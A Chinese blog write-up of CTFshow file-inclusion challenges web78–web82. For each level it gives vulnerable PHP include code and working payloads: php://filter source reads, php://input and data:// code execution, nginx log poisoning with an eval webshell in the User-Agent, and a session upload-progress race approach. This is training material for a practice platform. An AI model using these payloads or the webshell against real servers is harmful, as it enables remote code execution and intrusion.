【CTFshow】文件包含web78-web81

最新推荐文章于 2024-04-28 20:33:33 发布
最新推荐文章于 2024-04-28 20:33:33 发布
阅读量4.4k 收藏 3
点赞数 2
分类专栏: CTFshow 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51614272/article/details/123140142
版权

文件包含web78-web81

web78

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}
  • 看到源码中的include函数,这个表示从外部引入php文件并执行,如果执行不成功,就返回文件的源码。
  • file关键字的get参数传递,php://是一种协议名称,php://filter/是一种访问本地文件的协议,/read=convert.base64-encode/表示读取的方式是base64编码后,resource=index.php表示目标文件为index.php。
  • 而include的内容是由用户控制的,所以通过我们传递的file参数,是include()函数引入了index.php的base64编码格式,因为是base64编码格式,所以执行不成功,返回源码,所以我们得到了源码的base64格式,解码即可。
    payload:
?file=php://filter/convert.base64-encode/resource=flag.php

在这里插入图片描述

web79

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}
php://input伪协议
  • str_replace()函数把php替换成了???
  • php伪协议大小写可以绕过,使用php://input伪协议
    构造payload:(注意是大写的PHP)
?file=Php://input

再post:<?php system("tac flag.php");?>
data协议
  • 或者使用data协议直接进行代码执行
    构造payload:
?file=data://text/plain,<?=system("tac%20flag.php");?>

web80

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}
php://input伪协议
  • 把data过滤了,就不能用data协议了,可以继续使用上题php:input协议
    构造payload:(注意是大写的PHP)
?file=Php://input

再post:<?php system("tac flag.php");?>
日志包含绕过

日志文件在?file=/var/log/nginx/access.log,一句话写入UA
构造payload:

?file=/var/log/nginx/access.log
修改UA为:<?php @eval($_REQUEST[1])?>
1=system("ls");
1=system("tac fl0g.php");

web81

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);

访问日志文件,日志的路径及组成没变,解法和上一题相同

web82(没完全理解)

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}
  • 日志包含使用不了,我们使用session文件包含,先了解一些知识点,在php5.4之后php.ini开始有几个默认选项

1.session.upload_progress.enabled = on
2.session.upload_progress.cleanup = on
3.session.upload_progress.prefix = “upload_progress_”
4.session.upload_progress.name = “PHP_SESSION_UPLOAD_PROGRESS”
5.session.use_strict_mode=off

第一个表示当浏览器向服务器上传一个文件时,php将会把此次文件上传的详细信息(如上传时间、上传进度等)存储在session当中
第二个表示当文件上传结束后,php将会立即清空对应session文件中的内容
第三和第四个prefix+name将表示为session中的键名
第五个表示我们对Cookie中sessionID可控

  • 简而言之,我们可以利用session.upload_progress将木马写入session文件,然后包含这个session文件。不过前提是我们需要创建一个session文件,并且知道session文件的存放位置。因为session.use_strict_mode=off的关系,我们可以自定义sessionID
  • linux系统中session文件一般的默认存储位置为 /tmp 或 /var/lib/php/session
  • 例如我们在Cookie中设置了PHPSESSID=flag,php会在服务器上创建文件:/tmp/sess_flag,即使此时用户没有初始化session,php也会自动初始化Session。并产生一个键值,为prefix+name的值,最后被写入sess_文件里
  • 还有一个关键点就是session.upload_progress.cleanup默认是开启的,只要读取了post数据,就会清除进度信息,所以我们需要利用条件竞争来pass
Sunlight_614
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web78-web81文件包含漏洞 wp
qq_56158055的博客
01-16 4195
事先声明,本文只用来学习交流,不参与以任何商业形式的活动。本文不会出现flag。 web78 啥都没过滤,直接用php伪协议查看flag.php 解码得出flag web79 通过替换函数,将php换成了???,可以换一个php的伪协议绕过,用data伪协议 web80 这里把data也给过滤了,所有换一个伪协议,用input伪协议 然后查看f10g.php就能得到flag web81 这下把:这过滤了,伪协议是用不...
CTFshow-Web入门》09. Web 81~90
学习学习学习......
09-01 1415
include() 利用,一句话木马之 Nginx 日志利用、条件竞争写入木马、file_put_contents() 利用,伪协议(php://filter/)、伪协议(data://)、PHP 特性之 intval()。
ctfshow web入门 文件包含:web78-web81 web88 web116 web117
rawrecruit的博客
04-14 7147
个人ctfshow刷题记录
ctfshow web78 获取flag(用老版的火狐浏览器)
最新发布
XiaoYeZhu_1314的博客
04-28 331
第一种:利用input伪协议 ,获取到flag。第二种:利用flter协议,获取到flag。第三种:利用data 协议 获取到fag。
ctfshow-web80、81
m0_73590931的博客
08-11 380
然后,代码使用str_replace()函数对file变量进行两次替换操作。第一次替换将file中的php字符串替换为?,第二次替换将file中的data字符串替换为?首先,代码使用isset()函数检查是否存在名为'file'的GET参数。发现与刚刚一样都是user-agent,那还是在user-agent中插入一句话木马,后续做法与web80一样。最后,代码使用include()函数来包含$file变量所代表的文件。意思是将file中的:字符串替换为?看网页信息,发现是nginx服务器。
ctfshow web入门文件包含web78-81
m0_62207170的博客
04-16 161
ctfshow web入门文件包含web78-81
linux nginx配置81端口用于访问web81
没有腹肌的程序员
11-24 2738
多配置一个default81.conf文件 server {     listen       81;     server_name  localhost;     root   /data/web81;     error_page   500 502 503 504  /50x.html;     location ~ \.php$ {         fastcgi_pass un...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow web入门 78-88的文件包含
Firebasky的博客
09-18 4154
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
ctfshow-web78(文件包含)
m0_62094846的博客
01-11 1258
if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?file=php://filter/read=convert.base64-encode/resource=flag.php
[ctfshow]web入门文件包含78-88
L1ni01
12-04 2374
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志包含漏洞 先抓包,发现是nginx,一般的日志路径为 /var/log/nginx/access.log 访问发现成功 进行getshel
CTFshow 文件包含 web81
Kradress的博客
12-08 282
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 15:51:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
CTFshow_web入门_文件包含_web78-
weixin_43896504的博客
07-22 387
文件包含
ctfshow 文件包含Web78-79
m0_62584974的博客
04-15 1827
Ctfshow文件包含漏洞Web78 2022/4/15 漏洞简介: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。 Web78 考察php伪协议 php://伪协议:php://伪协议是PHP提供的一些输人输出流访问功能,允许访问PHP的输入输出流,标准输人输出和错误描述符,.
ctfshow web入门 web文件包含 web78--web81
2301_81040377的博客
04-03 297
php伪协议和日志文件访问
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值